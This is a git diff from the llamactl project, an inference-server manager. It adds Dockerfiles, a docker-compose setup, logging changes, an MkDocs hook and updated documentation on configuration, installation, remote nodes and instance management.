enabled: false
image: "vllm/vllm-openai:latest"
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g", "-v", "~/.local/share/llamactl/huggingface:/root/.cache/huggingface"]
environment: {} # Environment variables for the container
mlx:

View File

@@ -5,6 +5,7 @@ import (
"llamactl/pkg/config"
"llamactl/pkg/manager"
"llamactl/pkg/server"
"log"
"net/http"
"os"
"os/signal"
@@ -22,6 +23,9 @@ var buildTime string = "unknown"
// @license.name MIT License
// @license.url https://opensource.org/license/mit/
// @basePath /api/v1
// @securityDefinitions.apikey ApiKeyAuth
// @in header
// @name X-API-Key
func main() {
// --version flag to print the version
@@ -35,8 +39,7 @@ func main() {
configPath := os.Getenv("LLAMACTL_CONFIG_PATH")
cfg, err := config.LoadConfig(configPath)
if err != nil {
fmt.Printf("Error loading config: %v\n", err)
fmt.Println("Using default configuration.")
log.Printf("Error loading config: %v\nUsing default configuration.", err)
}
// Set version information
@@ -47,18 +50,16 @@ func main() {
// Create the data directory if it doesn't exist
if cfg.Instances.AutoCreateDirs {
if err := os.MkdirAll(cfg.Instances.InstancesDir, 0755); err != nil {
fmt.Printf("Error creating config directory %s: %v\n", cfg.Instances.InstancesDir, err)
fmt.Println("Persistence will not be available.")
log.Printf("Error creating config directory %s: %v\nPersistence will not be available.", cfg.Instances.InstancesDir, err)
}
if err := os.MkdirAll(cfg.Instances.LogsDir, 0755); err != nil {
fmt.Printf("Error creating log directory %s: %v\n", cfg.Instances.LogsDir, err)
fmt.Println("Instance logs will not be available.")
log.Printf("Error creating log directory %s: %v\nInstance logs will not be available.", cfg.Instances.LogsDir, err)
}
}
// Initialize the instance manager
instanceManager := manager.NewInstanceManager(cfg.Backends, cfg.Instances)
instanceManager := manager.New(&cfg)
// Create a new handler with the instance manager
handler := server.NewHandler(instanceManager, cfg)
@@ -78,7 +79,7 @@ func main() {
go func() {
fmt.Printf("Llamactl server listening on %s:%d\n", cfg.Server.Host, cfg.Server.Port)
if err := server.ListenAndServe(); err != nil && err != http.ErrServerClosed {
fmt.Printf("Error starting server: %v\n", err)
log.Printf("Error starting server: %v\n", err)
}
}()
@@ -87,7 +88,7 @@ func main() {
fmt.Println("Shutting down server...")
if err := server.Close(); err != nil {
fmt.Printf("Error shutting down server: %v\n", err)
log.Printf("Error shutting down server: %v\n", err)
} else {
fmt.Println("Server shut down gracefully.")
}

View File

@@ -0,0 +1,23 @@
# llamactl bundled with the llama.cpp CUDA server image.
FROM ghcr.io/ggml-org/llama.cpp:server-cuda

# Install curl for downloading llamactl
RUN apt-get update && apt-get install -y curl && rm -rf /var/lib/apt/lists/*

# Download and install the latest llamactl release.
# -f makes curl exit non-zero on HTTP errors instead of piping an error page
# into grep/tar, and the explicit check aborts with a readable message when the
# release tag cannot be resolved (e.g. GitHub API rate limiting).
RUN LATEST_VERSION=$(curl -fsSL https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/') && \
    if [ -z "${LATEST_VERSION}" ]; then echo "Could not determine the latest llamactl release tag" >&2; exit 1; fi && \
    curl -fsSL "https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-linux-amd64.tar.gz" | tar -xz && \
    mv llamactl /usr/local/bin/ && \
    chmod +x /usr/local/bin/llamactl

# Set working directory
RUN mkdir -p /data
WORKDIR /data

# Expose the default llamactl port
EXPOSE 8080

# Point llamactl at the llama-server binary under /app and make the shared
# libraries in /app resolvable at runtime.
ENV LLAMACTL_LLAMACPP_COMMAND=/app/llama-server
ENV LD_LIBRARY_PATH="/app:/usr/local/lib:/usr/lib"

# Set llamactl as the entrypoint
ENTRYPOINT ["llamactl"]

64
docker/Dockerfile.source Normal file
View File

@@ -0,0 +1,64 @@
# WebUI build stage
# Node.js 22 matches the documented build requirement ("Node.js 22 or later").
FROM node:22-alpine AS webui-builder

WORKDIR /webui

# Copy webui package files first so the dependency layer is cached
# independently of source changes
COPY webui/package*.json ./

# Install dependencies
RUN npm ci

# Copy webui source
COPY webui/ ./

# Build webui
RUN npm run build

# Go build stage
FROM golang:1.24-alpine AS builder

# Install build dependencies
RUN apk add --no-cache git ca-certificates

# Set working directory
WORKDIR /build

# Copy go mod files
COPY go.mod go.sum ./

# Download dependencies
RUN go mod download

# Copy source code
COPY cmd/ ./cmd/
COPY pkg/ ./pkg/
COPY docs/ ./docs/
COPY webui/webui.go ./webui/

# Copy built webui from webui-builder
COPY --from=webui-builder /webui/dist ./webui/dist

# Build the application as a stripped binary with cgo disabled
RUN CGO_ENABLED=0 GOOS=linux go build -a -installsuffix cgo -ldflags="-w -s" -o llamactl ./cmd/server

# Final stage
FROM alpine:latest

# Install runtime dependencies
RUN apk --no-cache add ca-certificates

# Create data directory
RUN mkdir -p /data

# Set working directory
WORKDIR /data

# Copy binary from builder
COPY --from=builder /build/llamactl /usr/local/bin/llamactl

# Expose the default port
EXPOSE 8080

# Set llamactl as the entrypoint
ENTRYPOINT ["llamactl"]

20
docker/Dockerfile.vllm Normal file
View File

@@ -0,0 +1,20 @@
# llamactl bundled with the vLLM OpenAI-compatible server image.
FROM vllm/vllm-openai:latest

# Install curl for downloading llamactl
RUN apt-get update && apt-get install -y curl && rm -rf /var/lib/apt/lists/*

# Download and install the latest llamactl release.
# -f makes curl exit non-zero on HTTP errors instead of piping an error page
# into grep/tar, and the explicit check aborts with a readable message when the
# release tag cannot be resolved (e.g. GitHub API rate limiting).
RUN LATEST_VERSION=$(curl -fsSL https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/') && \
    if [ -z "${LATEST_VERSION}" ]; then echo "Could not determine the latest llamactl release tag" >&2; exit 1; fi && \
    curl -fsSL "https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-linux-amd64.tar.gz" | tar -xz && \
    mv llamactl /usr/local/bin/ && \
    chmod +x /usr/local/bin/llamactl

# Set working directory
RUN mkdir -p /data
WORKDIR /data

# Expose the default llamactl port
EXPOSE 8080

# Set llamactl as the entrypoint (replaces the base image's entrypoint)
ENTRYPOINT ["llamactl"]

56
docker/docker-compose.yml Normal file
View File

@@ -0,0 +1,56 @@
# Compose definitions for running llamactl with a bundled CUDA backend.
# Relative host paths below are resolved relative to this file's directory.
version: '3.8'

services:
  llamactl-llamacpp:
    build:
      context: ..
      dockerfile: docker/Dockerfile.llamacpp
    image: llamactl:llamacpp-cuda
    container_name: llamactl-llamacpp
    ports:
      - "8080:8080"
    volumes:
      - ./data/llamacpp:/data
      - ./models:/models  # Mount models directory
      - ~/.cache/llama.cpp:/root/.cache/llama.cpp  # Llama.cpp cache
    environment:
      # Set data directory for persistence
      - LLAMACTL_DATA_DIR=/data
      # Enable Docker mode for nested containers (if needed)
      - LLAMACTL_LLAMACPP_DOCKER_ENABLED=false
    deploy:
      resources:
        reservations:
          devices:
            - driver: nvidia
              count: all
              capabilities: [gpu]
    restart: unless-stopped

  llamactl-vllm:
    build:
      context: ..
      dockerfile: docker/Dockerfile.vllm
    image: llamactl:vllm-cuda
    container_name: llamactl-vllm
    ports:
      - "8081:8080"  # Use different port to avoid conflicts
    volumes:
      - ./data/vllm:/data
      - ./models:/models  # Mount models directory
      - ~/.cache/huggingface:/root/.cache/huggingface  # HuggingFace cache
    environment:
      # Set data directory for persistence
      - LLAMACTL_DATA_DIR=/data
      # Enable Docker mode for nested containers (if needed)
      - LLAMACTL_VLLM_DOCKER_ENABLED=false
      # Expose all GPUs to the container. CUDA_VISIBLE_DEVICES only accepts
      # device indices or UUIDs; "all" is the NVIDIA container runtime
      # setting, so it belongs in NVIDIA_VISIBLE_DEVICES.
      - NVIDIA_VISIBLE_DEVICES=all
    deploy:
      resources:
        reservations:
          devices:
            - driver: nvidia
              count: all
              capabilities: [gpu]
    restart: unless-stopped

View File

@@ -1,5 +1,6 @@
mkdocs-material==9.5.3
mkdocs==1.5.3
pymdown-extensions==10.7
mkdocs-git-revision-date-localized-plugin==1.2.4
mike==2.0.0
mkdocs-material==9.6.22
mkdocs==1.6.1
pymdown-extensions==10.16.1
mkdocs-git-revision-date-localized-plugin==1.4.7
mike==2.1.3
neoteroi-mkdocs==1.1.3

1
docs/api-reference.md Normal file
View File

@@ -0,0 +1 @@
[OAD(swagger.yaml)]

View File

@@ -17,33 +17,37 @@ server:
host: "0.0.0.0" # Server host to bind to
port: 8080 # Server port to bind to
allowed_origins: ["*"] # Allowed CORS origins (default: all)
allowed_headers: ["*"] # Allowed CORS headers (default: all)
enable_swagger: false # Enable Swagger UI for API docs
backends:
llama-cpp:
command: "llama-server"
args: []
environment: {} # Environment variables for the backend process
environment: {} # Environment variables for the backend process
docker:
enabled: false
image: "ghcr.io/ggml-org/llama.cpp:server"
args: ["run", "--rm", "--network", "host", "--gpus", "all"]
environment: {}
response_headers: {} # Additional response headers to send with responses
vllm:
command: "vllm"
args: ["serve"]
environment: {} # Environment variables for the backend process
environment: {} # Environment variables for the backend process
docker:
enabled: false
image: "vllm/vllm-openai:latest"
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
environment: {}
response_headers: {} # Additional response headers to send with responses
mlx:
command: "mlx_lm.server"
args: []
environment: {} # Environment variables for the backend process
environment: {} # Environment variables for the backend process
response_headers: {} # Additional response headers to send with responses
instances:
port_range: [8000, 9000] # Port range for instances
@@ -66,13 +70,17 @@ auth:
inference_keys: [] # Keys for inference endpoints
require_management_auth: true # Require auth for management endpoints
management_keys: [] # Keys for management endpoints
local_node: "main" # Name of the local node (default: "main")
nodes: # Node configuration for multi-node deployment
main: # Default local node (empty config)
```
## Configuration Files
### Configuration File Locations
Configuration files are searched in the following locations (in order of precedence):
Configuration files are searched in the following locations (in order of precedence, first found is used):
**Linux:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
@@ -101,6 +109,7 @@ server:
host: "0.0.0.0" # Server host to bind to (default: "0.0.0.0")
port: 8080 # Server port to bind to (default: 8080)
allowed_origins: ["*"] # CORS allowed origins (default: ["*"])
allowed_headers: ["*"] # CORS allowed headers (default: ["*"])
enable_swagger: false # Enable Swagger UI (default: false)
```
@@ -116,40 +125,46 @@ backends:
llama-cpp:
command: "llama-server"
args: []
environment: {} # Environment variables for the backend process
environment: {} # Environment variables for the backend process
docker:
enabled: false # Enable Docker runtime (default: false)
enabled: false # Enable Docker runtime (default: false)
image: "ghcr.io/ggml-org/llama.cpp:server"
args: ["run", "--rm", "--network", "host", "--gpus", "all"]
environment: {}
response_headers: {} # Additional response headers to send with responses
vllm:
command: "vllm"
args: ["serve"]
environment: {} # Environment variables for the backend process
environment: {} # Environment variables for the backend process
docker:
enabled: false
enabled: false # Enable Docker runtime (default: false)
image: "vllm/vllm-openai:latest"
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
environment: {}
response_headers: {} # Additional response headers to send with responses
mlx:
command: "mlx_lm.server"
args: []
environment: {} # Environment variables for the backend process
environment: {} # Environment variables for the backend process
# MLX does not support Docker
response_headers: {} # Additional response headers to send with responses
```
**Backend Configuration Fields:**
- `command`: Executable name/path for the backend
- `args`: Default arguments prepended to all instances
- `environment`: Environment variables for the backend process (optional)
- `response_headers`: Additional response headers to send with responses (optional)
- `docker`: Docker-specific configuration (optional)
- `enabled`: Boolean flag to enable Docker runtime
- `image`: Docker image to use
- `args`: Additional arguments passed to `docker run`
- `environment`: Environment variables for the container (optional)
> If llamactl is behind an NGINX proxy, `X-Accel-Buffering: no` response header may be required for NGINX to properly stream the responses without buffering.
**Environment Variables:**
**LlamaCpp Backend:**
@@ -160,6 +175,7 @@ backends:
- `LLAMACTL_LLAMACPP_DOCKER_IMAGE` - Docker image to use
- `LLAMACTL_LLAMACPP_DOCKER_ARGS` - Space-separated Docker arguments
- `LLAMACTL_LLAMACPP_DOCKER_ENV` - Docker environment variables in format "KEY1=value1,KEY2=value2"
- `LLAMACTL_LLAMACPP_RESPONSE_HEADERS` - Response headers in format "KEY1=value1;KEY2=value2"
**VLLM Backend:**
- `LLAMACTL_VLLM_COMMAND` - VLLM executable command
@@ -169,11 +185,13 @@ backends:
- `LLAMACTL_VLLM_DOCKER_IMAGE` - Docker image to use
- `LLAMACTL_VLLM_DOCKER_ARGS` - Space-separated Docker arguments
- `LLAMACTL_VLLM_DOCKER_ENV` - Docker environment variables in format "KEY1=value1,KEY2=value2"
- `LLAMACTL_VLLM_RESPONSE_HEADERS` - Response headers in format "KEY1=value1;KEY2=value2"
**MLX Backend:**
- `LLAMACTL_MLX_COMMAND` - MLX executable command
- `LLAMACTL_MLX_ARGS` - Space-separated default arguments
- `LLAMACTL_MLX_ENV` - Environment variables in format "KEY1=value1,KEY2=value2"
- `LLAMACTL_MLX_RESPONSE_HEADERS` - Response headers in format "KEY1=value1;KEY2=value2"
### Instance Configuration
@@ -221,18 +239,32 @@ auth:
management_keys: [] # List of valid management API keys
```
**Environment Variables:**
- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)
- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
**Environment Variables:**
- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)
- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
## Command Line Options
### Remote Node Configuration
View all available command line options:
llamactl supports remote node deployments. Configure remote nodes to deploy instances on remote hosts and manage them centrally.
```bash
llamactl --help
```yaml
local_node: "main" # Name of the local node (default: "main")
nodes: # Node configuration map
main: # Local node (empty address means local)
address: "" # Not used for local node
api_key: "" # Not used for local node
worker1: # Remote worker node
address: "http://192.168.1.10:8080"
api_key: "worker1-api-key" # Management API key for authentication
```
You can also override configuration using command line flags when starting llamactl.
**Node Configuration Fields:**
- `local_node`: Specifies which node in the `nodes` map represents the local node. Must match exactly what other nodes call this node.
- `nodes`: Map of node configurations
- `address`: HTTP/HTTPS URL of the remote node (empty for local node)
- `api_key`: Management API key for authenticating with the remote node
**Environment Variables:**
- `LLAMACTL_LOCAL_NODE` - Name of the local node

1814
docs/css/css-v1.1.3.css Normal file

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

60
docs/fix_line_endings.py Normal file
View File

@@ -0,0 +1,60 @@
"""
MkDocs hook to fix line endings for proper rendering.
Automatically adds two spaces at the end of lines that need line breaks.
"""
import re
def on_page_markdown(markdown, page, config, **kwargs):
    """
    Fix line endings in markdown content for proper MkDocs rendering.

    Appends a Markdown hard line break (two trailing spaces) to every regular
    text line so that consecutive source lines are not merged into a single
    paragraph when rendered.

    Args:
        markdown: Raw Markdown source of the page.
        page: Page object supplied by the hook caller (unused).
        config: Configuration object supplied by the hook caller (unused).
        **kwargs: Additional hook arguments (ignored).

    Returns:
        The Markdown text with hard line breaks added where appropriate.
    """
    # A Markdown hard line break is exactly two trailing spaces; a single
    # trailing space is not treated as a break.
    hard_break = '  '

    processed_lines = []
    in_code_block = False

    for line in markdown.split('\n'):
        stripped = line.strip()

        # Fence lines toggle the code-block state and are passed through as-is.
        if stripped.startswith('```'):
            in_code_block = not in_code_block
            processed_lines.append(line)
            continue

        # Leave code-block content and empty lines untouched.
        if in_code_block or not stripped:
            processed_lines.append(line)
            continue

        # Skip lines that shouldn't have line breaks:
        # - Headers (# ## ###)
        # - Blockquotes (>)
        # - Table rows (|)
        # - Lines already ending with two spaces
        # - YAML front matter / horizontal rules (---) and HTML tags
        # - Standalone punctuation lines
        if (stripped.startswith(('#', '>', '---', '<')) or
                '|' in stripped or
                line.endswith(hard_break) or
                stripped.endswith('>') or
                stripped in ('.', '!', '?', ':', ';', ',')):
            processed_lines.append(line)
            continue

        # Regular text: normalise trailing whitespace to exactly one hard break.
        processed_lines.append(line.rstrip() + hard_break)

    return '\n'.join(processed_lines)

View File

@@ -1,105 +0,0 @@
# Installation
This guide will walk you through installing Llamactl on your system.
## Prerequisites
### Backend Dependencies
llamactl supports multiple backends. Install at least one:
**For llama.cpp backend (all platforms):**
You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
```bash
# Homebrew (macOS/Linux)
brew install llama.cpp
# Winget (Windows)
winget install llama.cpp
```
Or build from source - see llama.cpp docs
**For MLX backend (macOS only):**
MLX provides optimized inference on Apple Silicon. Install MLX-LM:
```bash
# Install via pip (requires Python 3.8+)
pip install mlx-lm
# Or in a virtual environment (recommended)
python -m venv mlx-env
source mlx-env/bin/activate
pip install mlx-lm
```
Note: MLX backend is only available on macOS with Apple Silicon (M1, M2, M3, etc.)
**For vLLM backend:**
vLLM provides high-throughput distributed serving for LLMs. Install vLLM:
```bash
# Install via pip (requires Python 3.8+, GPU required)
pip install vllm
# Or in a virtual environment (recommended)
python -m venv vllm-env
source vllm-env/bin/activate
pip install vllm
# For production deployments, consider container-based installation
```
## Installation Methods
### Option 1: Download Binary (Recommended)
Download the latest release from the [GitHub releases page](https://github.com/lordmathis/llamactl/releases):
```bash
# Linux/macOS - Get latest version and download
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# Or download manually from:
# https://github.com/lordmathis/llamactl/releases/latest
# Windows - Download from releases page
```
### Option 2: Build from Source
Requirements:
- Go 1.24 or later
- Node.js 22 or later
- Git
If you prefer to build from source:
```bash
# Clone the repository
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
# Build the web UI
cd webui && npm ci && npm run build && cd ..
# Build the application
go build -o llamactl ./cmd/server
```
## Verification
Verify your installation by checking the version:
```bash
llamactl --version
```
## Next Steps
Now that Llamactl is installed, continue to the [Quick Start](quick-start.md) guide to get your first instance running!

View File

@@ -1,190 +0,0 @@
# Quick Start
This guide will help you get Llamactl up and running in just a few minutes.
## Step 1: Start Llamactl
Start the Llamactl server:
```bash
llamactl
```
By default, Llamactl will start on `http://localhost:8080`.
## Step 2: Access the Web UI
Open your web browser and navigate to:
```
http://localhost:8080
```
Login with the management API key. By default it is generated during server startup. Copy it from the terminal output.
You should see the Llamactl web interface.
## Step 3: Create Your First Instance
1. Click the "Add Instance" button
2. Fill in the instance configuration:
- **Name**: Give your instance a descriptive name
- **Backend Type**: Choose from llama.cpp, MLX, or vLLM
- **Model**: Model path or identifier for your chosen backend
- **Additional Options**: Backend-specific parameters
3. Click "Create Instance"
## Step 4: Start Your Instance
Once created, you can:
- **Start** the instance by clicking the start button
- **Monitor** its status in real-time
- **View logs** by clicking the logs button
- **Stop** the instance when needed
## Example Configurations
Here are basic example configurations for each backend:
**llama.cpp backend:**
```json
{
"name": "llama2-7b",
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/llama-2-7b-chat.gguf",
"threads": 4,
"ctx_size": 2048,
"gpu_layers": 32
}
}
```
**MLX backend (macOS only):**
```json
{
"name": "mistral-mlx",
"backend_type": "mlx_lm",
"backend_options": {
"model": "mlx-community/Mistral-7B-Instruct-v0.3-4bit",
"temp": 0.7,
"max_tokens": 2048
}
}
```
**vLLM backend:**
```json
{
"name": "dialogpt-vllm",
"backend_type": "vllm",
"backend_options": {
"model": "microsoft/DialoGPT-medium",
"tensor_parallel_size": 2,
"gpu_memory_utilization": 0.9
}
}
```
## Docker Support
Llamactl can run backends in Docker containers. To enable Docker for a backend, add a `docker` section to that backend in your YAML configuration file (e.g. `config.yaml`) as shown below:
```yaml
backends:
vllm:
command: "vllm"
args: ["serve"]
docker:
enabled: true
image: "vllm/vllm-openai:latest"
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
```
## Using the API
You can also manage instances via the REST API:
```bash
# List all instances
curl http://localhost:8080/api/instances
# Create a new llama.cpp instance
curl -X POST http://localhost:8080/api/instances/my-model \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf"
}
}'
# Start an instance
curl -X POST http://localhost:8080/api/instances/my-model/start
```
## OpenAI Compatible API
Llamactl provides OpenAI-compatible endpoints, making it easy to integrate with existing OpenAI client libraries and tools.
### Chat Completions
Once you have an instance running, you can use it with the OpenAI-compatible chat completions endpoint:
```bash
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-d '{
"model": "my-model",
"messages": [
{
"role": "user",
"content": "Hello! Can you help me write a Python function?"
}
],
"max_tokens": 150,
"temperature": 0.7
}'
```
### Using with Python OpenAI Client
You can also use the official OpenAI Python client:
```python
from openai import OpenAI
# Point the client to your Llamactl server
client = OpenAI(
base_url="http://localhost:8080/v1",
api_key="not-needed" # Llamactl doesn't require API keys by default
)
# Create a chat completion
response = client.chat.completions.create(
model="my-model", # Use the name of your instance
messages=[
{"role": "user", "content": "Explain quantum computing in simple terms"}
],
max_tokens=200,
temperature=0.7
)
print(response.choices[0].message.content)
```
### List Available Models
Get a list of running instances (models) in OpenAI-compatible format:
```bash
curl http://localhost:8080/v1/models
```
## Next Steps
- Manage instances [Managing Instances](../user-guide/managing-instances.md)
- Explore the [API Reference](../user-guide/api-reference.md)
- Configure advanced settings in the [Configuration](configuration.md) guide

Binary file not shown.

Before

Width:  |  Height:  |  Size: 69 KiB

After

Width:  |  Height:  |  Size: 66 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 31 KiB

After

Width:  |  Height:  |  Size: 45 KiB

View File

@@ -14,20 +14,20 @@ Welcome to the Llamactl documentation!
## Quick Links
- [Installation Guide](getting-started/installation.md) - Get Llamactl up and running
- [Configuration Guide](getting-started/configuration.md) - Detailed configuration options
- [Quick Start](getting-started/quick-start.md) - Your first steps with Llamactl
- [Managing Instances](user-guide/managing-instances.md) - Instance lifecycle management
- [API Reference](user-guide/api-reference.md) - Complete API documentation
- [Installation Guide](installation.md) - Get Llamactl up and running
- [Configuration Guide](configuration.md) - Detailed configuration options
- [Quick Start](quick-start.md) - Your first steps with Llamactl
- [Managing Instances](managing-instances.md) - Instance lifecycle management
- [API Reference](api-reference.md) - Complete API documentation
## Getting Help
If you need help or have questions:
- Check the [Troubleshooting](user-guide/troubleshooting.md) guide
- Check the [Troubleshooting](troubleshooting.md) guide
- Visit the [GitHub repository](https://github.com/lordmathis/llamactl)
- Review the [Configuration Guide](getting-started/configuration.md) for advanced settings
- Review the [Configuration Guide](configuration.md) for advanced settings
## License

174
docs/installation.md Normal file
View File

@@ -0,0 +1,174 @@
# Installation
This guide will walk you through installing Llamactl on your system.
## Prerequisites
### Backend Dependencies
llamactl supports multiple backends. Install at least one:
**For llama.cpp backend (all platforms):**
You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
```bash
# Homebrew (macOS/Linux)
brew install llama.cpp
# Winget (Windows)
winget install llama.cpp
```
Or build from source - see llama.cpp docs
**For MLX backend (macOS only):**
MLX provides optimized inference on Apple Silicon. Install MLX-LM:
```bash
# Install via pip (requires Python 3.8+)
pip install mlx-lm
# Or in a virtual environment (recommended)
python -m venv mlx-env
source mlx-env/bin/activate
pip install mlx-lm
```
Note: MLX backend is only available on macOS with Apple Silicon (M1, M2, M3, etc.)
**For vLLM backend:**
vLLM provides high-throughput distributed serving for LLMs. Install vLLM:
```bash
# Install in a virtual environment
python -m venv vllm-env
source vllm-env/bin/activate
pip install vllm
```
## Installation Methods
### Option 1: Download Binary (Recommended)
Download the latest release from the [GitHub releases page](https://github.com/lordmathis/llamactl/releases):
```bash
# Linux/macOS - Get latest version and download
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# Or download manually from:
# https://github.com/lordmathis/llamactl/releases/latest
# Windows - Download from releases page
```
### Option 2: Docker
llamactl provides Dockerfiles for creating Docker images with backends pre-installed. The resulting images include the latest llamactl release with the respective backend.
**Available Dockerfiles (CUDA):**
- **llamactl with llama.cpp CUDA**: `docker/Dockerfile.llamacpp` (based on `ghcr.io/ggml-org/llama.cpp:server-cuda`)
- **llamactl with vLLM CUDA**: `docker/Dockerfile.vllm` (based on `vllm/vllm-openai:latest`)
- **llamactl built from source**: `docker/Dockerfile.source` (multi-stage build with webui)
**Note:** These Dockerfiles are configured for CUDA. For other platforms (CPU, ROCm, Vulkan, etc.), adapt the base image. For llama.cpp, see available tags at [llama.cpp Docker docs](https://github.com/ggml-org/llama.cpp/blob/master/docs/docker.md). For vLLM, check [vLLM docs](https://docs.vllm.ai/en/v0.6.5/serving/deploying_with_docker.html).
**Using Docker Compose**
```bash
# Clone the repository
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
# Create directories for data and models
mkdir -p data/llamacpp data/vllm models
# Start llamactl with llama.cpp backend
docker-compose -f docker/docker-compose.yml up llamactl-llamacpp -d
# Or start llamactl with vLLM backend
docker-compose -f docker/docker-compose.yml up llamactl-vllm -d
```
Access the dashboard at:
- llamactl with llama.cpp: http://localhost:8080
- llamactl with vLLM: http://localhost:8081
**Using Docker Build and Run**
1. llamactl with llama.cpp CUDA:
```bash
docker build -f docker/Dockerfile.llamacpp -t llamactl:llamacpp-cuda .
docker run -d \
--name llamactl-llamacpp \
--gpus all \
-p 8080:8080 \
-v ~/.cache/llama.cpp:/root/.cache/llama.cpp \
llamactl:llamacpp-cuda
```
2. llamactl with vLLM CUDA:
```bash
docker build -f docker/Dockerfile.vllm -t llamactl:vllm-cuda .
docker run -d \
--name llamactl-vllm \
--gpus all \
-p 8080:8080 \
-v ~/.cache/huggingface:/root/.cache/huggingface \
llamactl:vllm-cuda
```
3. llamactl built from source:
```bash
docker build -f docker/Dockerfile.source -t llamactl:source .
docker run -d \
--name llamactl \
-p 8080:8080 \
llamactl:source
```
### Option 3: Build from Source
Requirements:
- Go 1.24 or later
- Node.js 22 or later
- Git
If you prefer to build from source:
```bash
# Clone the repository
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
# Build the web UI
cd webui && npm ci && npm run build && cd ..
# Build the application
go build -o llamactl ./cmd/server
```
## Remote Node Installation
For deployments with remote nodes:
- Install llamactl on each node using any of the methods above
- Configure API keys for authentication between nodes
- Ensure node names are consistent across all configurations
## Verification
Verify your installation by checking the version:
```bash
llamactl --version
```
## Next Steps
Now that Llamactl is installed, continue to the [Quick Start](quick-start.md) guide to get your first instance running!
For remote node deployments, see the [Configuration Guide](configuration.md) for node setup instructions.

View File

@@ -9,13 +9,17 @@ Llamactl provides two ways to manage instances:
- **Web UI**: Accessible at `http://localhost:8080` with an intuitive dashboard
- **REST API**: Programmatic access for automation and integration
![Dashboard Screenshot](../images/dashboard.png)
![Dashboard Screenshot](images/dashboard.png)
### Authentication
If authentication is enabled:
Llamactl uses a **Management API Key** to authenticate requests to the management API (creating, starting, stopping instances). All curl examples below use `<token>` as a placeholder - replace this with your actual Management API Key.
By default, authentication is required. If you don't configure a management API key in your configuration file, llamactl will auto-generate one and print it to the terminal on startup. See the [Configuration](configuration.md) guide for details.
For Web UI access:
1. Navigate to the web UI
2. Enter your credentials
2. Enter your Management API Key
3. Bearer token is stored for the session
### Theme Support
@@ -33,39 +37,46 @@ Each instance is displayed as a card showing:
## Create Instance
### Via Web UI
**Via Web UI**
![Create Instance Screenshot](../images/create_instance.png)
![Create Instance Screenshot](images/create_instance.png)
1. Click the **"Create Instance"** button on the dashboard
2. *Optional*: Click **"Import"** in the dialog header to load a previously exported configuration
2. Enter a unique **Name** for your instance (only required field)
3. **Choose Backend Type**:
3. **Select Target Node**: Choose which node to deploy the instance to from the dropdown
4. **Choose Backend Type**:
- **llama.cpp**: For GGUF models using llama-server
- **MLX**: For MLX-optimized models (macOS only)
- **vLLM**: For distributed serving and high-throughput inference
4. Configure model source:
5. Configure model source:
- **For llama.cpp**: GGUF model path or HuggingFace repo
- **For MLX**: MLX model path or identifier (e.g., `mlx-community/Mistral-7B-Instruct-v0.3-4bit`)
- **For vLLM**: HuggingFace model identifier (e.g., `microsoft/DialoGPT-medium`)
5. Configure optional instance management settings:
6. Configure optional instance management settings:
- **Auto Restart**: Automatically restart instance on failure
- **Max Restarts**: Maximum number of restart attempts
- **Restart Delay**: Delay in seconds between restart attempts
- **On Demand Start**: Start instance when receiving a request to the OpenAI compatible endpoint
- **Idle Timeout**: Minutes before stopping idle instance (set to 0 to disable)
- **Environment Variables**: Set custom environment variables for the instance process
6. Configure backend-specific options:
7. Configure backend-specific options:
- **llama.cpp**: Threads, context size, GPU layers, port, etc.
- **MLX**: Temperature, top-p, adapter path, Python environment, etc.
- **vLLM**: Tensor parallel size, GPU memory utilization, quantization, etc.
7. Click **"Create"** to save the instance
### Via API
!!! tip "Auto-Assignment"
Llamactl automatically assigns ports from the configured port range (default: 8000-9000) and generates API keys if authentication is enabled. You typically don't need to manually specify these values.
8. Click **"Create"** to save the instance
**Via API**
```bash
# Create llama.cpp instance with local model file
